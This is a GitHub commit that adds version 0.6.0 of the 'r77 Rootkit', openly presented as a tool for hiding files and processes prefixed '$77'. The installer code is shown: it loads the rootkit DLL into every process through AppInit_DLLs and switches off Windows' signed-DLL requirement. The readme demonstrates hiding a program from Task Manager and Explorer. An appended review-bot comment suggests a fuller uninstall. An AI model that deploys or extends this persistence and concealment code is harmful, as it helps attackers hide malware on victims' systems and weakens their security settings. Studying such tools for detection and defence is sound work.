
0.6.0

bytecode77 committed Dec 17, 2017
1 parent f053e5f commit df35bfc3f897fb745f40b088383a068edb113a6b
Showing with 4,256 additions and 0 deletions.
  1. BIN !Docs/Examples/$77-ExampleExecutable.exe
  2. +10 −0 !Docs/Examples/Readme.txt
  3. BIN !Docs/ImageBanner.pdn
  4. +2 −0 !Docs/Rescue.txt
  5. +2 −0 !Docs/Restart Explorer.bat
  6. +16 −0 .gitignore
  7. +16 −0 Install/App.xaml
  8. +8 −0 Install/App.xaml.cs
  9. +101 −0 Install/Install.csproj
  10. +43 −0 Install/MainWindow.xaml
  11. +70 −0 Install/MainWindow.xaml.cs
  12. +83 −0 Install/Properties/Resources.Designer.cs
  13. +127 −0 Install/Properties/Resources.resx
  14. BIN Install/Resources/ImageBanner.png
  15. BIN Install/Resources/Install.ico
  16. +16 −0 Install/app.manifest
  17. +23 −0 LICENSE.md
  18. +17 −0 r77-src/FileBothDirInformationEx.h
  19. +14 −0 r77-src/FileDirectoryInformationEx.h
  20. +15 −0 r77-src/FileFullDirInformationEx.h
  21. +18 −0 r77-src/FileIdBothDirInformationEx.h
  22. +16 −0 r77-src/FileIdFullDirInformationEx.h
  23. +67 −0 r77-src/FileInformationClassEx.h
  24. +7 −0 r77-src/FileNamesInformationEx.h
  25. +322 −0 r77-src/MinHook/HDE/hde32.c
  26. +105 −0 r77-src/MinHook/HDE/hde32.h
  27. +333 −0 r77-src/MinHook/HDE/hde64.c
  28. +112 −0 r77-src/MinHook/HDE/hde64.h
  29. +39 −0 r77-src/MinHook/HDE/pstdint.h
  30. +73 −0 r77-src/MinHook/HDE/table32.h
  31. +74 −0 r77-src/MinHook/HDE/table64.h
  32. +169 −0 r77-src/MinHook/MinHook.h
  33. +315 −0 r77-src/MinHook/buffer.c
  34. +42 −0 r77-src/MinHook/buffer.h
  35. +880 −0 r77-src/MinHook/hook.c
  36. +316 −0 r77-src/MinHook/trampoline.c
  37. +105 −0 r77-src/MinHook/trampoline.h
  38. +149 −0 r77-src/Rootkit.cpp
  39. +18 −0 r77-src/Rootkit.h
  40. +13 −0 r77-src/SystemProcessInformationEx.h
  41. +10 −0 r77-src/main.cpp
  42. +24 −0 r77-src/r77.h
  43. +111 −0 r77-x64/r77-x64.vcxproj
  44. +93 −0 r77-x64/r77-x64.vcxproj.filters
  45. +111 −0 r77-x86/r77-x86.vcxproj
  46. +93 −0 r77-x86/r77-x86.vcxproj.filters
  47. +78 −0 r77.sln
Binary file not shown.
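--- a/!Docs/Examples/Readme.txt
+++ b/!Docs/Examples/Readme.txt
@@ -0,0 +1,10 @@
+r77 Rootkit fill hide files and processes that start with "$77" (without the quotes)
+
+Example to test the effects:
+1. Run "$77-ExampleExecutable.exe"
+2. It's visible in Task Manager
+3. Install rootkit
+4. Restart Task Manager
+5. It's no longer visible in Task Manager
+6. Restart Explorer
+7. Guess what... It's hidden there, too.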
Binary file not shown.
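--- a/!Docs/Rescue.txt
+++ b/!Docs/Rescue.txt
@@ -0,0 +1,2 @@
+Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows
+Computer\HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Windows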
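--- a/!Docs/Restart Explorer.bat
+++ b/!Docs/Restart Explorer.bat
@@ -0,0 +1,2 @@
+taskkill /f /IM explorer.exe
+start explorer.exe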
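--- a/.gitignore
+++ b/.gitignore
@@ -0,0 +1,16 @@
+.vs/
+bin/
+obj/
+Debug/
+Release/
+ipch/
+TestResults/
+*.suo
+*.user
+*.sdf
+*.opensdf
+*.opendb
+*.VC.db
+[Tt]humbs.db
+
+$Build/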
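--- a/Install/App.xaml
+++ b/Install/App.xaml
@@ -0,0 +1,16 @@
+<Application
+x:Class="Install.App"
+xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"
+xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"
+xmlns:local="clr-namespace:Install"
+StartupUri="MainWindow.xaml">
+<Application.Resources>
+<Style TargetType="{x:Type Image}">
+<Setter Property="Stretch" Value="None" />
+</Style>
+<Style TargetType="{x:Type Button}">
+<Setter Property="Padding" Value="15,5" />
+<Setter Property="MinWidth" Value="75" />
+</Style>
+</Application.Resources>
+</Application>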
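--- a/Install/App.xaml.cs
+++ b/Install/App.xaml.cs
@@ -0,0 +1,8 @@
+using System.Windows;
+
+namespace Install
+{
+public partial class App : Application
+{
+}
+}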
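--- a/Install/Install.csproj
+++ b/Install/Install.csproj
@@ -0,0 +1,101 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+<Import Project="$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props')" />
+<PropertyGroup>
+<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
+<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
+<ProjectGuid>{751136EE-F31F-4FDB-BA60-2AD68356F1A0}</ProjectGuid>
+<OutputType>WinExe</OutputType>
+<RootNamespace>Install</RootNamespace>
+<AssemblyName>Install</AssemblyName>
+<TargetFrameworkVersion>v4.6.1</TargetFrameworkVersion>
+<FileAlignment>512</FileAlignment>
+<ProjectTypeGuids>{60dc8134-eba5-43b8-bcc9-bb4bc16c2548};{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}</ProjectTypeGuids>
+<WarningLevel>4</WarningLevel>
+<AutoGenerateBindingRedirects>true</AutoGenerateBindingRedirects>
+</PropertyGroup>
+<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
+<PlatformTarget>AnyCPU</PlatformTarget>
+<DebugSymbols>true</DebugSymbols>
+<DebugType>full</DebugType>
+<Optimize>false</Optimize>
+<OutputPath>bin\Debug\</OutputPath>
+<DefineConstants>DEBUG;TRACE</DefineConstants>
+<ErrorReport>prompt</ErrorReport>
+<WarningLevel>4</WarningLevel>
+<Prefer32Bit>false</Prefer32Bit>
+</PropertyGroup>
+<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
+<PlatformTarget>AnyCPU</PlatformTarget>
+<DebugType>pdbonly</DebugType>
+<Optimize>true</Optimize>
+<OutputPath>bin\Release\</OutputPath>
+<DefineConstants>TRACE</DefineConstants>
+<ErrorReport>prompt</ErrorReport>
+<WarningLevel>4</WarningLevel>
+<Prefer32Bit>false</Prefer32Bit>
+</PropertyGroup>
+<PropertyGroup>
+<ApplicationManifest>app.manifest</ApplicationManifest>
+</PropertyGroup>
+<ItemGroup>
+<Reference Include="System" />
+<Reference Include="System.Data" />
+<Reference Include="System.Drawing" />
+<Reference Include="System.Xml" />
+<Reference Include="Microsoft.CSharp" />
+<Reference Include="System.Core" />
+<Reference Include="System.Xml.Linq" />
+<Reference Include="System.Data.DataSetExtensions" />
+<Reference Include="System.Net.Http" />
+<Reference Include="System.Xaml">
+<RequiredTargetFramework>4.0</RequiredTargetFramework>
+</Reference>
+<Reference Include="WindowsBase" />
+<Reference Include="PresentationCore" />
+<Reference Include="PresentationFramework" />
+</ItemGroup>
+<ItemGroup>
+<ApplicationDefinition Include="App.xaml">
+<Generator>MSBuild:Compile</Generator>
+<SubType>Designer</SubType>
+</ApplicationDefinition>
+<Page Include="MainWindow.xaml">
+<Generator>MSBuild:Compile</Generator>
+<SubType>Designer</SubType>
+</Page>
+<Compile Include="App.xaml.cs">
+<DependentUpon>App.xaml</DependentUpon>
+<SubType>Code</SubType>
+</Compile>
+<Compile Include="MainWindow.xaml.cs">
+<DependentUpon>MainWindow.xaml</DependentUpon>
+<SubType>Code</SubType>
+</Compile>
+</ItemGroup>
+<ItemGroup>
+<Compile Include="Properties\Resources.Designer.cs">
+<AutoGen>True</AutoGen>
+<DesignTime>True</DesignTime>
+<DependentUpon>Resources.resx</DependentUpon>
+</Compile>
+<EmbeddedResource Include="Properties\Resources.resx">
+<Generator>ResXFileCodeGenerator</Generator>
+<LastGenOutput>Resources.Designer.cs</LastGenOutput>
+</EmbeddedResource>
+</ItemGroup>
+<ItemGroup>
+<None Include="app.manifest" />
+</ItemGroup>
+<ItemGroup>
+<Resource Include="Resources\ImageBanner.png" />
+</ItemGroup>
+<ItemGroup>
+<Resource Include="Resources\Install.ico" />
+</ItemGroup>
+<Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
+<PropertyGroup>
+<PostBuildEvent>mkdir $(SolutionDir)$Build
+xcopy /Y $(TargetPath) $(SolutionDir)$Build</PostBuildEvent>
+</PropertyGroup>
+</Project>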
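--- a/Install/MainWindow.xaml
+++ b/Install/MainWindow.xaml
@@ -0,0 +1,43 @@
+<Window
+x:Class="Install.MainWindow"
+xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"
+xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"
+xmlns:d="http://schemas.microsoft.com/expression/blend/2008"
+xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006"
+xmlns:local="clr-namespace:Install"
+mc:Ignorable="d"
+Title="Install / Uninstall r77 Rootkit" Width="500" SizeToContent="Height" ResizeMode="CanMinimize" WindowStartupLocation="CenterScreen" Icon="/Install;component/Resources/Install.ico">
+<Grid>
+<StackPanel>
+<Grid>
+<Image Source="/Install;component/Resources/ImageBanner.png" />
+<Label Content="Version 0.6.0" VerticalAlignment="Bottom" HorizontalAlignment="Right" />
+</Grid>
+<StackPanel Margin="20">
+<TextBlock TextWrapping="Wrap">
+<Run Text="r77 Rootkit will hide any" />
+<LineBreak />
+<Run Text=" • Processes" />
+<LineBreak />
+<Run Text=" • Files" />
+<LineBreak />
+<Run Text="That start with &quot;" /><Run Text="$77" FontWeight="Bold" /><Run Text="&quot; prefix." />
+<LineBreak />
+<LineBreak />
+<Run Text="Currently, file hiding does not work in x86 processes (work in progress)." />
+<LineBreak />
+<LineBreak />
+<Run Text="All x64 and x86 processes will be affected, but not already running ones. Restart taskmgr or explorer to see effect." />
+</TextBlock>
+</StackPanel>
+<StackPanel>
+<Border Background="#f8f8f8" BorderThickness="0,1,0,0" BorderBrush="#e7e7e7" Padding="10">
+<StackPanel Orientation="Horizontal" HorizontalAlignment="Right">
+<Button Content="Install" Margin="0,0,10,0" Click="btnInstall_Click" />
+<Button Content="Uninstall" Click="btnUninstall_Click" />
+</StackPanel>
+</Border>
+</StackPanel>
+</StackPanel>
+</Grid>
+</Window>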
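--- a/Install/MainWindow.xaml.cs
+++ b/Install/MainWindow.xaml.cs
@@ -0,0 +1,70 @@
+using Microsoft.Win32;
+using System;
+using System.IO;
+using System.Windows;
+
+namespace Install
+{
+public partial class MainWindow : Window
+{
+public MainWindow()
+{
+InitializeComponent();
+}
+
+private void btnInstall_Click(object sender, RoutedEventArgs e)
+{
+try
+{
+Install(true);
+Install(false);
+
+MessageBox.Show("r77 is now installed to AppInit_DLLs.", "Information", MessageBoxButton.OK, MessageBoxImage.Information);
+}
+catch (Exception ex)
+{
+MessageBox.Show(ex.GetType() + ": " + ex.Message + "\r\n" + ex.StackTrace, "Error", MessageBoxButton.OK, MessageBoxImage.Error);
+}
+}
+private void btnUninstall_Click(object sender, RoutedEventArgs e)
+{
+try
+{
+bool removed = false;
+
+foreach (bool is64bit in new[] { true, false })
+{
+using (RegistryKey key = RegistryKey.OpenBaseKey(RegistryHive.LocalMachine, is64bit ? RegistryView.Registry64 : RegistryView.Registry32).OpenSubKey(@"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows", true))
+{
+if ((key.GetValue("AppInit_DLLs", "") as string).Contains("$77-"))
+{
+key.SetValue("AppInit_DLLs", "");
+removed = true;
+}
+}
+}
+
+MessageBox.Show(removed ? "r77 was now removed from AppInit_DLLs." : "r77 was not found in AppInit_DLLs.", "Information", MessageBoxButton.OK, MessageBoxImage.Information);
+}
+catch (Exception ex)
+{
+MessageBox.Show(ex.GetType() + ": " + ex.Message + "\r\n" + ex.StackTrace, "Error", MessageBoxButton.OK, MessageBoxImage.Error);
+}
+}
+
+private void Install(bool is64bit)
+{
+string extension = "x" + (is64bit ? 64 : 86) + ".dll";
+string destPath = Path.Combine(Path.GetTempPath(), "$77-" + Guid.NewGuid().ToString("N") + "-" + extension);
+File.Copy(Path.Combine(AppDomain.CurrentDomain.BaseDirectory, "r77-" + extension), destPath);
+new FileInfo(destPath).Attributes |= FileAttributes.Temporary;
+
+using (RegistryKey key = RegistryKey.OpenBaseKey(RegistryHive.LocalMachine, is64bit ? RegistryView.Registry64 : RegistryView.Registry32).OpenSubKey(@"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows", true))
+{
+key.SetValue("LoadAppInit_DLLs", 1);
+key.SetValue("RequireSignedAppInit_DLLs", 0);
+key.SetValue("AppInit_DLLs", destPath);
+}
+}
+}
+}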
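Review bot: The uninstall path is incomplete: the `using` block in btnUninstall_Click only blanks `AppInit_DLLs`, while the `LoadAppInit_DLLs`=1 and `RequireSignedAppInit_DLLs`=0 values written at the end of Install(bool) are left in place and the `$77-*.dll` copied into the temp directory is never deleted, so after an "uninstall" the host still accepts unsigned AppInit DLLs and the file remains on disk. `OpenSubKey` can return null when the key is absent and `GetValue("AppInit_DLLs", "") as string` is null for a non-string value kind, so the `.Contains("$77-")` check can fail with a NullReferenceException instead of a clear error, and the `RegistryKey` returned by `OpenBaseKey` is never disposed in either method. The rewritten block below reads the configured path before clearing it, reverts the two policy values (the installer does not record their prior values, so the secure settings are used), deletes the file on a best-effort basis (it may still be mapped by a running process), and disposes both keys; the same null and disposal fixes apply to the `using` in Install(bool).
```csharp
using (RegistryKey baseKey = RegistryKey.OpenBaseKey(RegistryHive.LocalMachine, is64bit ? RegistryView.Registry64 : RegistryView.Registry32))
using (RegistryKey key = baseKey.OpenSubKey(@"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows", true))
{
    if (key is null)
    {
        throw new InvalidOperationException("Windows NT\\CurrentVersion\\Windows key not found.");
    }

    string current = key.GetValue("AppInit_DLLs", "") as string ?? "";
    if (current.Contains("$77-"))
    {
        key.SetValue("AppInit_DLLs", "");
        // Revert the policy values Install(bool) changed; prior values were not recorded, so use the secure settings.
        key.SetValue("RequireSignedAppInit_DLLs", 1);
        key.SetValue("LoadAppInit_DLLs", 0);

        // Best-effort cleanup: the DLL may still be mapped by a running process.
        try { File.Delete(current); }
        catch (IOException) { }
        catch (UnauthorizedAccessException) { }

        removed = true;
    }
}
// … unchanged: rest of btnUninstall_Click (MessageBox, catch) …
```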

